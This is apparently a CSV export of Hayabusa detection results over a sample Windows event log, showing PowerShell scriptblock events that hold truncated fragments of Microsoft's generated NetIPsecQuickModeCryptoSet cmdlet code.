function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 
([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if 
($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service 
SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process 
{ try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] 
[ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery')",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject 
